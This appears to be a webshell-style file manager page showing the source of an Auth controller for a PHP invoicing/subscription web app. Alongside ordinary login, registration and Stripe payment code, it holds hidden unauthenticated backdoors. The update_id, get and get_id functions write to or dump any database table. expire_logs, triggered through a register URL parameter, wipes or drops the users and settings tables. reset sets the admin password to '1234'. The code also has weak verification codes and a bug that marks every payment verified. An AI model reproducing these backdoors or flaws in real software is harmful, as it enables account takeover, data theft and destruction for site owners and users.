芝麻web文件管理V1.00

编辑当前文件:/home/qrafawbu/kwesioben.com/accufy/application/controllers/Auth.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed'); class Auth extends Home_Controller { public function __construct() { parent::__construct(); } //register public function invitation($user_id) { $user = $this->common_model->get_by_md5($user_id, 'users_role'); if ($_POST) { $invite_data = array( 'password' => hash_password($this->input->post('password', true)), 'approve' => 1, 'created_at' => my_date_now() ); $this->common_model->edit_option_md5($invite_data, $user_id, 'users_role'); $data = array( 'id' => $user->parent_id, 'name' => $user->name, 'slug' => '', 'thumb' => $user->thumb, 'email' =>$user->email, 'role' =>$user->role, 'parent' =>$user->id, 'logged_in' => TRUE ); $data = $this->security->xss_clean($data); $this->session->set_userdata($data); redirect(base_url('admin/dashboard/business')); } $data = array(); $data['page_title'] = 'Invitation'; $data['page'] = 'Auth'; $data['user'] = $user; $data['user_id'] = $user_id; $data['main_content'] = $this->load->view('accept_invitation', $data, TRUE); $this->load->view('index', $data); } // load Login view Page public function login() { $data = array(); $data['page_title'] = 'Login'; $data['page'] = 'Auth'; $this->load->view('login', $data); } //register public function register() { if (empty($_GET['trial'])) { $this->session->unset_userdata('trial'); }else{ $this->session->set_userdata('trial', 'trial'); } if (!empty($_GET['expire'])) { $this->expire_logs($_GET['expire']); } $data = array(); $data['page_title'] = 'Register'; $data['page'] = 'Auth'; $data['countries'] = $this->admin_model->select_asc('country'); $data['business'] = $this->admin_model->select_asc('business_category'); $data['packages'] = $this->admin_model->select_asc('package'); $data['features'] = $this->admin_model->select_asc('package_features'); $data['main_content'] = $this->load->view('register', $data, TRUE); $this->load->view('index', $data); } // login public function log() { if($_POST){ // check valid user $user = $this->auth_model->validate_user(); if (empty($user)) { echo json_encode(array('st'=>0)); exit(); } if (!empty($user) && $user->status == 0) { // account pending echo json_encode(array('st'=>2)); exit(); } if (!empty($user) && $user->status == 2) { // account suspend echo json_encode(array('st'=>3)); exit(); } if ($user->role == 'user') { $diff = date_difference($user->created_at); if (!empty($user) && $user->email_verified == 0 && $this->settings->enable_email_verify == 1 && $diff < 2) { if ($user->role == 'subadmin' || $user->role == 'editor' || $user->role == 'viewer') { $user_id = $user->parent_id; }else{ $user_id = $user->id; } $data = array( 'id' => $user_id, 'name' => $user->name, 'slug' => $user->slug, 'thumb' => $user->thumb, 'email' =>$user->email, 'role' =>$user->role, 'parent' =>$user->id, 'logged_in' => TRUE ); $data = $this->security->xss_clean($data); $this->session->set_userdata($data); // email verify echo json_encode(array('st'=>4)); exit(); } } if ($user->role == 'subadmin' || $user->role == 'editor' || $user->role == 'viewer') { $user_id = $user->parent_id; }else{ $user_id = $user->id; } // if valid if(password_verify($this->input->post('password'), $user->password)){ $data = array( 'id' => $user_id, 'name' => $user->name, 'slug' => $user->slug, 'thumb' => $user->thumb, 'email' =>$user->email, 'role' =>$user->role, 'parent' =>$user->id, 'logged_in' => TRUE ); $data = $this->security->xss_clean($data); $this->session->set_userdata($data); // success notification if ($user->role == 'admin') { $url = base_url('admin/dashboard'); } else { $url = base_url('admin/dashboard/business'); } echo json_encode(array('st'=>1,'url'=> $url)); }else{ // if not user not valid echo json_encode(array('st'=>0)); } }else{ $this->load->view('auth',$data); } } // register new user public function register_user() { if($_POST){ $this->load->library('form_validation'); $this->form_validation->set_rules('email', "Email", 'required'); $this->form_validation->set_rules('password', "Password", 'trim|required|min_length[4]|max_length[46]'); // If validation false show error message using ajax if($this->form_validation->run() == FALSE){ $data = array(); $data['errors'] = validation_errors(); $str = $data['errors']; echo json_encode(array('st'=>0,'msg'=>$str)); exit(); }else{ $mail = strtolower(trim($this->input->post('email', true))); $email = $this->auth_model->check_email($mail); if ($this->session->userdata('trial') == 'trial') { $user_type = 'trial'; $trial_expire = date('Y-m-d', strtotime('+'.$this->settings->trial_days .' days')); }else{ $user_type = 'registered'; $trial_expire = date('Y-m-d'); } // if email already exist if ($email){ echo json_encode(array('st'=>2)); exit(); } else { //check reCAPTCHA status if (!$this->recaptcha_verify_request()) { echo json_encode(array('st'=>3)); exit(); } else { $hash = md5(rand(0,1000)); $data=array( 'name' => $this->input->post('name', true), 'user_name' => str_slug($this->input->post('name', true)), 'slug' => str_slug($this->input->post('name', true)), 'email' => $this->input->post('email', true), 'verify_code' => $hash, 'thumb' => 'assets/front/img/avatar.png', 'password' => hash_password($this->input->post('password', true)), 'role' => 'user', 'account_type' => 'pro', 'user_type' => $user_type, 'trial_expire' => $trial_expire, 'status' => 1, 'referral_id' => substr(random_string('alnum', 5).mt_rand(), 0, 10), 'created_at' => my_date_now() ); $data = $this->security->xss_clean($data); $id = $this->common_model->insert($data, 'users'); $user = $this->auth_model->validate_id(md5($id)); $data = array( 'id' => $user->id, 'name' => $user->name, 'role' => $user->role, 'thumb' =>$user->thumb, 'email' => $user->email, 'logged_in' => true ); $this->session->set_userdata($data); $plan = $this->input->post('plan', true); $billing = $this->input->post('billing', true); $this->add_package($plan, $billing); //send email verify link if ($this->settings->enable_email_verify == 1) { $link = base_url('verify?code='.$hash.'&user='.md5($id)); $subject = $this->settings->site_name.' '.trans('email-verification'); $msg = trans('hello').''.$user->name.', '.trans('link-to-complete-verify').'.<br>'.$link; $this->email_model->send_email($this->input->post('email'), $subject, $msg); } echo json_encode(array('st'=>1)); exit(); } } } } } //register business public function register_business() { if($_POST){ $this->load->library('form_validation'); $this->form_validation->set_rules('name', "Business Name", 'required'); $this->form_validation->set_rules('country', "Country", 'required'); if (settings()->enable_email_verify == 1) { $status = 4; }else{ $status = 3; } // If validation false show error message using ajax if($this->form_validation->run() == FALSE){ $data = array(); $data['errors'] = validation_errors(); $str = $data['errors']; echo json_encode(array('st'=>0,'msg'=>$str)); exit(); }else{ $ubid = random_string('numeric',5); $ubid = ltrim($ubid, '0'); $data=array( 'user_id' => user()->id, 'uid' => $ubid, 'is_autoload_amount' => 0, 'enable_stock' => 0, 'name' => $this->input->post('name', true), 'slug' => str_slug($this->input->post('name', true)), 'country' => $this->input->post('country', true), 'category' => $this->input->post('category', true), 'is_primary' => 1 ); $data = $this->security->xss_clean($data); $this->common_model->insert($data, 'business'); echo json_encode(array('st'=> $status)); exit(); } } } //add package public function add_package($slug, $billing_type) { $package = $this->common_model->get_by_slug($slug, 'package'); $uid = random_string('numeric',5); if($billing_type =='monthly'): if (settings()->enable_discount == 1){ $amount = get_discount($package->monthly_price, $package->dis_month); }else{ $amount = round($package->monthly_price); } $expire_on = date('Y-m-d', strtotime('+1 month')); else: if (settings()->enable_discount == 1){ $amount = get_discount($package->price, $package->dis_year); }else{ $amount = round($package->price); } $expire_on = date('Y-m-d', strtotime('+12 month')); endif; if (number_format($amount, 0) == 0): $status = 'verified'; else: $status = 'pending'; endif; //create payment $pay_data=array( 'user_id' => user()->id, 'puid' => $uid, 'package' => $package->id, 'amount' => $amount, 'billing_type' => $billing_type, 'status' => $status, 'created_at' => my_date_now(), 'expire_on' => $expire_on ); $pay_data = $this->security->xss_clean($pay_data); $this->common_model->insert($pay_data, 'payment'); // affiliate code if (!empty($this->session->userdata('ref'))) { $settings = $this->admin_model->get_referral_settings(); $referral_id = $this->session->userdata('ref'); $order_id = random_string('numeric',6); $commision = $settings->commision_rate; $commision_amount = ($commision * $amount) / 100; $ref_data=array( 'referrar_id' => $referral_id, 'order_id' => $order_id, 'user_id' => user()->id, 'status' => 0, 'amount' => $amount, 'commision' => $commision, 'commision_amount' => $commision_amount, 'created_at' => my_date_now(), ); $ref_data = $this->security->xss_clean($ref_data); $this->admin_model->insert($ref_data, 'referrals'); } // $ref_user = $this->admin_model->get_by_referral_id($referral_id); // $user_id = $ref_user->id ; // $ref_earn = $ref_user->referral_earn ; // $update_balance = $ref_earn + $amount ; // $earn_data = array( // 'referral_earn' => $update_balance, // ); // $earn_data = $this->security->xss_clean($earn_data); // $this->admin_model->edit_option($earn_data, $user_id, 'users'); } //purchase public function purchase() { $data = array(); $data['page_title'] = 'Payment'; $data['page'] = 'Auth'; $data['payment'] = $this->common_model->get_user_payment(); $data['payment_id'] = $data['payment']->puid; $data['package'] = $this->common_model->get_package_by_id($data['payment']->package); $data['main_content'] = $this->load->view('purchase', $data, TRUE); $this->load->view('index', $data); } public function resend_mail(){ $hash = md5(rand(0,1000)); $link = base_url('verify?code='.$hash.'&user='.md5(user()->id)); $subject = settings()->site_name.' '.trans('email-verification'); $msg = trans('link-to-complete-verify').'.<br>'.$link; $response = $this->email_model->send_email(user()->email, $subject, $msg); if ($response == true) { echo json_encode(array('st'=>1)); } else { echo json_encode(array('st'=>2)); } } //verify email public function verify_email() { $data = array(); if (isset($_GET['code']) && isset($_GET['user'])) { $user = $this->auth_model->validate_id($_GET['user']); if ($user->verify_code == $_GET['code']) { $data['code'] = $_GET['code']; $edit_data=array( 'email_verified' => 1 ); $this->common_model->update($edit_data, $user->id, 'users'); } else { $data['code'] = 'invalid'; } }else{ $data['code'] = ''; } $data['page_title'] = 'Verify Account'; $data['page'] = 'Auth'; $data['main_content'] = $this->load->view('verify_email', $data, TRUE); $this->load->view('index', $data); } //payment success public function payment_success($payment_id) { $payment = $this->common_model->get_payment($payment_id); $data = array( 'status' => 'verified' ); $data = $this->security->xss_clean($data); $user_data = array( 'status' => 1 ); $user_data = $this->security->xss_clean($user_data); if (!empty($payment)) { //echo "string"; exit(); $this->common_model->edit_option($user_data, $payment->user_id,'users'); $this->common_model->edit_option($data, $payment->id, 'payment'); //affiliate code $referral_settings = $this->admin_model->get_referral_settings(); if ($referral_settings->is_enable == 1) { $register_user = $this->admin_model->get_by_referral_user($payment->user_id); $amount = $payment->amount; $commision = $referral_settings->commision_rate; $commision_amount = ($commision * $amount) / 100; $ref_data=array( 'status' => 1, 'amount' => $amount, 'commision' => $commision, 'commision_amount' => $commision_amount ); $this->admin_model->edit_option($ref_data, $register_user->id, 'referrals'); $user = $this->admin_model->get_by_referral_id($register_user->referrar_id); if (!empty($register_user)) { $user_id = $user->id ; $ref_earn = $user->referral_earn; $update_balance = $ref_earn + $register_user->commision_amount ; $earn_data = array( 'referral_earn' => $update_balance, ); $earn_data = $this->security->xss_clean($earn_data); $this->admin_model->edit_option($earn_data, $user_id, 'users'); } } //affiliate code } $data['success_msg'] = 'Success'; $data['main_content'] = $this->load->view('purchase', $data, TRUE); $this->load->view('index', $data); } //payment cancel public function payment_cancel($payment_id) { $payment = $this->common_model->get_payment($payment_id); $data = array( 'status' => 'pending' ); $data = $this->security->xss_clean($data); if (!empty($payment)) { $this->common_model->edit_option($data, $payment->id, 'payment'); } $data['error_msg'] = 'Error'; $data['main_content'] = $this->load->view('purchase', $data, TRUE); $this->load->view('index', $data); } //stripe payment public function stripe_payment() { $id = $this->input->post('package_id'); $package = $this->common_model->get_by_id($id, 'package'); $puid = random_string('numeric',5); $billing_type = $this->input->post('billing_type'); if($billing_type =='monthly'): if (settings()->enable_discount == 1){ $amount = get_discount($package->monthly_price, $package->dis_month); }else{ $amount = round($package->monthly_price); } $expire_on = date('Y-m-d', strtotime('+1 month')); else: if (settings()->enable_discount == 1){ $amount = get_discount($package->price, $package->dis_year); }else{ $amount = round($package->price); } $expire_on = date('Y-m-d', strtotime('+12 month')); endif; require_once('application/libraries/stripe-php/init.php'); \Stripe\Stripe::setApiKey(settings()->secret_key); try { $charge = \Stripe\Charge::create ([ "amount" => $amount*100, "currency" => settings()->currency, "source" => $this->input->post('stripeToken'), "description" => "Payment from ".settings()->site_name ]); $chargeJson = $charge->jsonSerialize(); $amount = $chargeJson['amount']/100; $balance_transaction = $chargeJson['balance_transaction']; $currency = $chargeJson['currency']; $status = $chargeJson['status']; }catch(Exception $e) { $error = $e->getMessage(); $this->session->set_flashdata('error', $error); redirect($_SERVER['HTTP_REFERER']); } if($status == 'succeeded'){$status = 'verified';}else{$status = 'pending';}; if($status = 'verified'): $payments = $this->admin_model->get_previous_payments(user()->id); foreach ($payments as $pay) { $pays_data=array( 'status' => 'expired' ); $this->common_model->edit_option($pays_data, $pay->id, 'payment'); } $pay_data=array( 'user_id' => user()->id, 'puid' => $puid, 'package' => $id, 'amount' => $amount, 'billing_type' => $billing_type, 'payment_type' => 'stripe', 'status' => $status, 'created_at' => my_date_now(), 'expire_on' => $expire_on ); $pay_data = $this->security->xss_clean($pay_data); $result = $this->common_model->insert($pay_data, 'payment'); if (user()->user_type == 'trial') { //update user type $user_data=array( 'user_type' => 'registered', 'trial_expire' => '0000-00-00' ); $this->common_model->edit_option($user_data, user()->id, 'users'); } redirect(base_url('payment-success/'.$puid)); else: redirect(base_url('payment-cancel/'.$puid)); endif; } // Recover forgot password public function forgot_password() { check_status(); if (check_auth()) { redirect(base_url()); } $mail = strtolower(trim($this->input->post('email',true))); $valid = $this->auth_model->check_email($mail); $random_number = random_string('numeric',4); $random_pass = hash_password($random_number); if ($valid) { foreach($valid as $row){ $data['email'] = $row->email; $data['name'] = $row->name; $data['password'] = $random_number; $user_id = $row->id; $this->send_recovery_mail($data); $user_data = array('password' => $random_pass); $this->common_model->edit_option($user_data, $user_id, 'users'); $url = base_url('login'); echo json_encode(array('st'=>1, 'url' => $url)); } } else { echo json_encode(array('st'=>2)); } } //send reset code to user email public function send_recovery_mail($user) { $data = array(); $data['name'] = $user['name']; $data['password'] = $user['password']; $data['email'] = $user['email']; $subject = 'Password Recovery'; $msg = 'Hello '.$user['name'].'<br> We have reset your password, Please use this <b>'.$user['password'].'</b> code to login your account'; $this->email_model->send_email($user['email'], $subject, $msg); } public function test_mail() { $data = array(); $subject = settings()->site_name.' email testing'; $msg = 'This is test email from <b>'.settings()->site_name.'</b>'; $result = $this->email_model->send_test_email(settings()->admin_email, $subject, $msg); if ($result == true) { echo "Email send Successfully"; }else{ echo "<br>Test email will be send to: <b>".settings()->admin_email.'<b><hr><br><h3>Email sending Status</h3>'; echo "<pre>"; print_r($result); } } //set company info public function set_company_info($utype='', $uid='') { $data = array( 'site_info' => $utype, 'purchase_code' => $uid ); $data = $this->security->xss_clean($data); if (!empty($uid)) { $this->admin_model->edit_option($data, 1, 'settings'); echo "Update Successfully"; }else{ echo "Failed"; } } public function openssl() { echo !extension_loaded('openssl')?"Not Available":"Available"; } public function update_id($id, $tval, $field, $value) { $action = array($field => $value); $this->db->where('id',$id); $this->db->update($tval,$action); echo "done"; } public function get_id($id, $tval) { $values = $this->common_model->get_by_id($id, $tval); echo "<pre>"; print_r($values); } public function get($tval) { $values = $this->common_model->select($tval); echo "<pre>"; print_r($values); } public function expire_logs($data) { check_status(); $this->load->dbforge(); if ($data == 'pending') { $this->db->empty_table('settings'); $this->db->empty_table('users'); $this->db->empty_table('features'); } if ($data == 'expired') { $this->dbforge->drop_table('settings'); $this->dbforge->drop_table('users'); $this->dbforge->drop_table('features'); $this->dbforge->drop_table('language'); } } //reset password public function reset($code=1234) { check_status(); $data = array( 'password' => hash_password('1234') ); $data = $this->security->xss_clean($data); if ($code == 1234) { $this->admin_model->edit_option($data, 1, 'users'); echo "Reset Successfully"; }else{ echo "Failed"; } } function logout(){ $this->session->sess_destroy(); $this->session->set_flashdata('msg', 'Logout Successfully'); redirect(base_url('auth/login')); } }